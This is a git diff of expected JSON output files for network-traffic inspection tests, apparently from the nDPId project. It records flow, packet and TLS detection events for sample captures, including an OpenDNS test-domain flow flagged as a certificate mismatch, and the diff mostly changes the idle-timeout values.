+00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1609756181300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1609756181300,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGqknAqAE8ag9ke9glAbsIXeEZAAAAALAC\/\/9qjwAAAgQFtAEDAwUBAQgKDpRqEwAAAAAEAgAA"} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1609756181671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1609756181671,"pkt":"KDc3AG3IEBMx8Tl2CABFAABAAABAACsGv0lqD2R7wKgBPAG72CWlbC1xCF3hGrASMqDiugAAAgQFrAEBAQEBAQEBAQEBAQEBAQEEAgAA"} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1609756181671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1609756181671,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGqmHAqAE8ag9ke9glAbsIXeEapWwtclAQ\/\/+JLgAA"} +00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609756181300,"flow_last_seen":1609756181681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1609756181681,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +05065{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7375,"flow_avg_l4_payload_len":614,"midstream":0,"thread_ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","server_names":"*.aliyun.com,manager.channel.aliyun.com,*.ace.aliyun.com,*.acs-internal.aliyuncs.com,*.acs.aliyun.com,*.aicrowd.aliyun.com,*.alibabacloud.co.in,*.alibabacloud.com,*.alibabacloud.com.au,*.alibabacloud.com.hk,*.alibabacloud.com.my,*.alibabacloud.com.sg,*.alibabacloud.com.tw,*.alicdn.com,*.alicloud.com,*.aligroup.aliyun.com,*.alimei.com,*.alink.aliyun.com,*.alios.aliyuncs.com,*.aliplus.com,*.alitranx.aliyun.com,*.aliyun-iot-share.com,*.aliyuncs.com,*.alyms.cn,*.ap-northeast-1.aliyuncs.com,*.ap-south-1.aliyuncs.com,*.ap-southeast-1.aliyuncs.com,*.ap-southeast-2.aliyuncs.com,*.ap-southeast-3.aliyuncs.com,*.ap-southeast-5.aliyuncs.com,*.api.aliyun.com,*.apm.aliyun.com,*.app.aliyun.com,*.asmlink.cn,*.banma.aliyuncs.com,*.base.shuju.aliyun.com,*.bi.aliyun.com,*.biz.aliyun.com,*.bridge.aliyun.com,*.ccc.aliyuncs.com,*.center.aliyun.com,*.citybrain.aliyun.com,*.cloudapp.aliyun.com,*.cloudeagle.cn,*.cloudgame.aliyun.com,*.cn-beijing.aliyuncs.com,*.cn-chengdu.aliyuncs.com,*.cn-guizhou.aliyuncs.com,*.cn-haidian.aliyuncs.com,*.cn-hangzhou-finance.aliyuncs.com,*.cn-hangzhou.aliyuncs.com,*.cn-hongkong.aliyuncs.com,*.cn-huhehaote.aliyuncs.com,*.cn-ningxia.aliyuncs.com,*.cn-north-2-gov-1.aliyuncs.com,*.cn-qingdao-nebula.aliyuncs.com,*.cn-qingdao.aliyuncs.com,*.cn-shanghai-finance-1.aliyuncs.com,*.cn-shanghai.aliyun.com,*.cn-shanghai.aliyuncs.com,*.cn-shenzhen-cloudstone.aliyuncs.com,*.cn-shenzhen-finance-1.aliyuncs.com,*.cn-shenzhen.aliyuncs.com,*.cn-sichuan.aliyuncs.com,*.cn-zhangjiakou.aliyuncs.com,*.connect.aliyun.com,*.console.alibabacloud.com,*.console.alicloud.com,*.console.aliyun.com,*.cs.aliyun.com,*.cschat-ccs.aliyun.com,*.data.aliyun.com,*.dataapi.aliyun.com,*.dataq.aliyuncs.com,*.datav.aliyun.com,*.datav.aliyuncs.com,*.devlops.aliyun.com,*.devops.aliyun.com,*.ditu.aliyun.com,*.domain.aliyun.com,*.dyiot.aliyun.com,*.ebs.aliyun.com,*.emas.aliyun.com,*.emr.aliyun.com,*.enterprise.aliy
un.com,*.env.aliyun.com,*.et-industry.aliyun.com,*.eu-central-1.aliyuncs.com,*.eu-west-1.aliyuncs.com,*.fc.aliyun.com,*.feedback.console.aliyun.com,*.gts-x.aliyun.com,*.gts.aliyun.com,*.help-ccs.aliyun.com,*.ialicdn.com,*.in-mumbai.aliyuncs.com,*.iot.aliyun.com,*.jp-fudao.aliyuncs.com,*.linkedmall.aliyun.com,*.linkwan.aliyun.com,*.living.aliyun.com,*.luban.aliyun.com,*.m.aliyun.com,*.market.aliyun.com,*.maxcompute.aliyun.com,*.me-east-1.aliyuncs.com,*.media.aliyun.com,*.microdingtalk.aliyun.com,*.mit.aliyun.com,*.mobile.aliyun.com,*.msea.aliyun.com,*.mts.aliyun.com,*.mvp.aliyun.com,*.nebula.aliyun.com,*.nls.aliyuncs.com,*.odps.aliyun.com,*.ons.aliyun.com,*.ose.aliyun.com,*.pai.data.aliyun.com,*.pcs-gw-cn-beijing.aliyun.com,*.pcs-gw-cn-shanghai.aliyun.com,*.phpwind.com,*.phpwind.net,*.pre-sg-purchase.aliyun.com,*.prepub.aliyun.com,*.product.center.aliyun.com,*.pts.aliyun.com,*.r-app-cn-beijing-data.aliyun.com,*.r-app-cn-hangzhou-data.aliyun.com,*.r-app-cn-shenzhen-data.aliyun.com,*.r-app-data.aliyun.com,*.rdc.aliyun.com,*.rds.aliyun.com,*.reid.aliyun.com,*.sc-cmdb.aliyuncs.com,*.scsp.aliyun.com,*.sg.aliyuncs.com,*.shuju.aliyun.com,*.smart.aliyun.com,*.soc.aliyun.com,*.soc.aliyuncs.com,*.sparenode.com,*.supet.com,*.tburl.in,*.teambition.com,*.teambition.net,*.teambitionapis.com,*.tianchi.aliyun.com,*.toolkit.aliyun.com,*.tv.aliyun.com,*.tw-gaoxiong.aliyuncs.com,*.us-east-1.aliyuncs.com,*.us-west-1.aliyuncs.com,*.webide.aliyun.com,*.yuntu.aliyun.com,account.www.net.cn,alibabacloud.co.in,alibabacloud.com,alibabacloud.com.au,alibabacloud.com.hk,alibabacloud.com.my,alibabacloud.com.sg,alibabacloud.com.tw,alicdn.com,alicloud.com,alimei.com,aliyun-iot-share.com,aliyuncs.com,dc.www.net.cn,dmp.www.net.cn,dns.www.net.cn,panda.www.net.cn,pandavip.www.net.cn,phpwind.com,phpwind.net,scdnphi6.com,sparenode.com,supet.com,tburl.in,teambition.com,teambition.net,teambitionapis.com,tianchi-global.com,whois.www.net.cn,aliyun.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf
5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2","subjectDN":"C=CN, ST=ZheJiang, L=HangZhou, O=Alibaba (China) Technology Co., Ltd., CN=*.aliyun.com","alpn":"h2,http\/1.1","fingerprint":"2B:C6:82:22:E9:94:09:24:34:E1:5C:F1:24:76:98:75:45:78:53:DA"}} +00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":47,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1609756181300,"flow_last_seen":1609756183162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12100,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1609756183162,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":47,"source":"long_tls_certificate.pcap","alias":"nDPId-test","packets-captured":47,"packets-processed":47,"total-skipped-flows":0,"total-l4-data-len":12100,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1609756183162} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 47/47 diff --git a/test/results/malware.pcap.out b/test/results/malware.pcap.out index a47559c78..bd1a167e0 100644 --- a/test/results/malware.pcap.out +++ b/test/results/malware.pcap.out 
@@ -8,25 +8,25 @@ 00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569571470672,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569571470672,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569571470672,"pkt":"CGoKOl4eMFLLbJwbCABFAABU4M1AAEABCcTAqAcHkIv33AgApMYAAQABjsKNXQAAAABuRAoAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="} 00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569571470672,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.297900} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569571476362,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569571476362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569571476362,"pkt":"CGoKOl4eMFLLbJwbCABFAAA0sPtAAEAGObHAqAcHkIv33IOqAFCfbfb4AAAAAIAC+vBQPgAAAgQFtAEBBAIBAwMH"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569571476362,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569571476362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569571476362,"pkt":"CGoKOl4eMFLLbJwbCABFAAA0sPtAAEAGObHAqAcHkIv33IOqAFCfbfb4AAAAAIAC+vBQPgAAAgQFtAEBBAIBAwMH"} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":4,"total-skipped-flows":0,"total-l4-data-len":196,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":3,"total-active-flows":3,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1569579408876} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7440000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569579408876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"thread_ts_msec":1569579408876,"pkt":"CGoKOl4eMFLLbJwbCABFAAFxQQlAAEAGkCXAqAcHQ9dc0r0KAFDJvdSn63fGVVAYAfZpvAAAR0VUIC8gSFRUUC8xLjENCkhvc3Q6IHd3dy5pbnRlcm5ldGJhZGd1eXMuY29tDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo2OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzY4LjANCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC41DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkROVDogMQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KDQo="} -00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7440000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OpenDNS","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.internetbadguys.com","url":"www.internetbadguys.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; rv:68.0) Gecko\/20100101 Firefox\/68.0"}} 
-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569579409087,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569579409087,"pkt":"MFLLbJwbCGoKOl4eCABFAABUIjBAADgGuBtD11zSwKgHBwBQvQrrd8wJyb3V8FAYAO11CAAALDXKuXRPxt9F45TTtQ17T177PqBz\/8Tm+6YgbZe0R+XFq38BUlr3UR8MAAA="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579416636,"flow_last_seen":1569579416636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579416636,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569579416636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569579416636,"pkt":"CGoKOl4eMFLLbJwbCABFAAA0xe5AAEAGDH3AqAcHQ9dc0omkAbvdSlrrAAAAAIAC+vBofwAAAgQFtAEBBAIBAwMH"} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569579416828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569579416828,"pkt":"MFLLbJwbCGoKOl4eCABFAAA0AABAADgG2mtD11zSwKgHBwG7iaQdaco+3Upa7IASchDpWQAAAgQFtAEBBAIBAwMH"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1569579416828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569579416828,"pkt":"CGoKOl4eMFLLbJwbCABFAAAoxe9AAEAGDIjAqAcHQ9dc0omkAbvdSlrsHWnKP1AQAfZocwAA"} -00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569579416636,"flow_last_seen":1569579416830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569579416830,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569579416636,"flow_last_seen":1569579417029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1569579417029,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02469{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569579416636,"flow_last_seen":1569579417030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4897,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1569579417030,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","server_names":"api.opendns.com,branded-login.opendns.com,cachecheck.opendns.com,community.opendns.com,dashboard2.opendns.com,dashboard.opendns.com,dashboard-ipv4.opendns.com,msp-login.opendns.com,api-ipv4.opendns.com,api-ipv6.opendns.com,authz.api.opendns.com,domain.opendns.com,help.vpn.opendns.com,ideabank.opendns.com,login.opendns.com,netgear.opendns.com,reseller-login.opendns.com,images.opendns.com,images-using.opendns.com,store.opendns.com,signup.opendns.com,twilio.opendns.com,updates.opendns.com,shared.opendns.com,tools.opendns.com,cache.opendns.com,api.umbrella.com,branded-login.umbrella.com,cachecheck.umbrella.com,community.umbrella.com,dashboard2.umbrella.com,dashboard.umbrella.com,dashboard-ipv4.umbrella.com,msp-login.umbrella.com,api-ipv4.umbrella.com,api-ipv6.umbrella.com,authz.api.umbrella.com,domain.umbrella.com,help.vpn.umbrella.com,ideabank.umbrella.com,login.umbrella.com,netgear.umbrella.com,reseller-login.umbrella.com,images.umbrella.com,images-using.umbrella.com,store.umbrella.com,signup.umbrella.com,twilio.umbrella.com,updates.umbrella.com,shared.umbrella.com,tools.umbrella.com,cache.umbrella.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=OpenDNS, Inc., CN=api.opendns.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"21:B4:CF:84:13:3A:21:A4:B0:02:63:76:39:84:EA:ED:27:EE:51:7C"}} 
-00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1569579416636,"flow_last_seen":1569579417280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6018,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 
